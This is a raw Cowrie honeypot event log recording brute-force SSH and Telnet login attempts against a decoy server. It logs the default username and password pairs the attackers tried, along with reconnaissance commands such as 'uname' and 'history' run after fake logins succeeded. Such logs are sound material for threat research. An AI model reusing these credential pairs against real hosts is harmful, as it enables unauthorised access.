{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:52:04.817081Z","src_ip":"212.227.125.160","session":"e1fead343ea9"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"123456","message":"login attempt [elastic/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:52:05.214959Z","src_ip":"212.227.125.160","session":"e1fead343ea9"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:52:06.322317Z","src_ip":"212.227.125.160","session":"e1fead343ea9"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":1144,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ddab1c68bde","protocol":"ssh","message":"New connection: 186.225.142.90:1144 (1.2.3.4:22) [session: 5ddab1c68bde]","sensor":"my-vps","timestamp":"2025-08-28T05:52:07.085524Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:52:07.461944Z","src_ip":"186.225.142.90","session":"5ddab1c68bde"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:52:07.462641Z","src_ip":"186.225.142.90","session":"5ddab1c68bde"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48269,"dst_ip":"1.2.3.4","dst_port":23,"session":"16f5c93139d8","protocol":"telnet","message":"New connection: 212.227.235.229:48269 (1.2.3.4:23) [session: 16f5c93139d8]","sensor":"my-vps","timestamp":"2025-08-28T05:52:09.457872Z"}
{"eventid":"cowrie.login.success","username":"root","password":"0896871270","message":"login attempt [root/0896871270] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:52:09.824439Z","src_ip":"186.225.142.90","session":"5ddab1c68bde"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:52:11.348667Z","src_ip":"186.225.142.90","session":"5ddab1c68bde"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-28T05:52:11.349487Z","src_ip":"186.225.142.90","session":"5ddab1c68bde"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:52:12.103068Z","src_ip":"186.225.142.90","session":"5ddab1c68bde"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:52:12.511494Z","src_ip":"186.225.142.90","session":"5ddab1c68bde"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37906,"dst_ip":"1.2.3.4","dst_port":22,"session":"174a1b36629e","protocol":"ssh","message":"New connection: 212.227.235.229:37906 (1.2.3.4:22) [session: 174a1b36629e]","sensor":"my-vps","timestamp":"2025-08-28T05:52:13.103842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:52:13.104836Z","src_ip":"212.227.235.229","session":"174a1b36629e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:52:13.256719Z","src_ip":"212.227.235.229","session":"174a1b36629e"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"123456","message":"login attempt [elastic/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:52:13.695602Z","src_ip":"212.227.235.229","session":"174a1b36629e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:52:14.842121Z","src_ip":"212.227.235.229","session":"174a1b36629e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41864,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0c4fb00144d","protocol":"ssh","message":"New connection: 212.227.125.160:41864 (1.2.3.4:22) [session: c0c4fb00144d]","sensor":"my-vps","timestamp":"2025-08-28T05:52:22.637882Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:52:22.638832Z","src_ip":"212.227.125.160","session":"c0c4fb00144d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:52:22.743058Z","src_ip":"212.227.125.160","session":"c0c4fb00144d"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx","message":"login attempt [root/!QAZ2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:52:23.215946Z","src_ip":"212.227.125.160","session":"c0c4fb00144d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:52:23.441298Z","src_ip":"212.227.125.160","session":"c0c4fb00144d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:52:23.442085Z","src_ip":"212.227.125.160","session":"c0c4fb00144d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:52:23.553866Z","src_ip":"212.227.125.160","session":"c0c4fb00144d"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:52:23.555211Z","src_ip":"212.227.125.160","session":"c0c4fb00144d"}
{"eventid":"cowrie.session.closed","duration":32.23419547080994,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:52:28.174178Z","src_ip":"8.222.212.69","session":"9b0c81575411"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45452,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa41dde48055","protocol":"ssh","message":"New connection: 212.227.235.229:45452 (1.2.3.4:22) [session: aa41dde48055]","sensor":"my-vps","timestamp":"2025-08-28T05:52:28.241592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:52:28.242552Z","src_ip":"212.227.235.229","session":"aa41dde48055"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:52:28.386612Z","src_ip":"212.227.235.229","session":"aa41dde48055"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx","message":"login attempt [root/!QAZ2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:52:28.820473Z","src_ip":"212.227.235.229","session":"aa41dde48055"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:52:29.192819Z","src_ip":"212.227.235.229","session":"aa41dde48055"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:52:29.193480Z","src_ip":"212.227.235.229","session":"aa41dde48055"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:52:29.338780Z","src_ip":"212.227.235.229","session":"aa41dde48055"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:52:29.339902Z","src_ip":"212.227.235.229","session":"aa41dde48055"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55774,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba90f60ea629","protocol":"ssh","message":"New connection: 212.227.125.160:55774 (1.2.3.4:22) [session: ba90f60ea629]","sensor":"my-vps","timestamp":"2025-08-28T05:52:35.885443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:52:35.886260Z","src_ip":"212.227.125.160","session":"ba90f60ea629"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:52:35.994397Z","src_ip":"212.227.125.160","session":"ba90f60ea629"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T05:52:36.343851Z","src_ip":"212.227.125.160","session":"ba90f60ea629"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:52:37.450880Z","src_ip":"212.227.125.160","session":"ba90f60ea629"}
{"eventid":"cowrie.session.closed","duration":31.319746255874634,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:52:40.777515Z","src_ip":"212.227.235.229","session":"16f5c93139d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55256,"dst_ip":"1.2.3.4","dst_port":22,"session":"e14520427d96","protocol":"ssh","message":"New connection: 212.227.235.229:55256 (1.2.3.4:22) [session: e14520427d96]","sensor":"my-vps","timestamp":"2025-08-28T05:52:43.122840Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:52:43.127337Z","src_ip":"212.227.235.229","session":"e14520427d96"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:52:43.268198Z","src_ip":"212.227.235.229","session":"e14520427d96"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T05:52:43.853942Z","src_ip":"212.227.235.229","session":"e14520427d96"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:52:45.007265Z","src_ip":"212.227.235.229","session":"e14520427d96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57162,"dst_ip":"1.2.3.4","dst_port":22,"session":"00db7a22b761","protocol":"ssh","message":"New connection: 212.227.125.160:57162 (1.2.3.4:22) [session: 00db7a22b761]","sensor":"my-vps","timestamp":"2025-08-28T05:52:50.573172Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:52:50.573844Z","src_ip":"212.227.125.160","session":"00db7a22b761"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:52:50.677141Z","src_ip":"212.227.125.160","session":"00db7a22b761"}
{"eventid":"cowrie.login.failed","username":"default","password":"1","message":"login attempt [default/1] failed","sensor":"my-vps","timestamp":"2025-08-28T05:52:51.125725Z","src_ip":"212.227.125.160","session":"00db7a22b761"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:52:52.232003Z","src_ip":"212.227.125.160","session":"00db7a22b761"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35588,"dst_ip":"1.2.3.4","dst_port":22,"session":"a90cbd05cd29","protocol":"ssh","message":"New connection: 212.227.235.229:35588 (1.2.3.4:22) [session: a90cbd05cd29]","sensor":"my-vps","timestamp":"2025-08-28T05:52:56.921877Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:52:56.923067Z","src_ip":"212.227.235.229","session":"a90cbd05cd29"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:52:57.066510Z","src_ip":"212.227.235.229","session":"a90cbd05cd29"}
{"eventid":"cowrie.login.failed","username":"default","password":"1","message":"login attempt [default/1] failed","sensor":"my-vps","timestamp":"2025-08-28T05:52:57.642745Z","src_ip":"212.227.235.229","session":"a90cbd05cd29"}
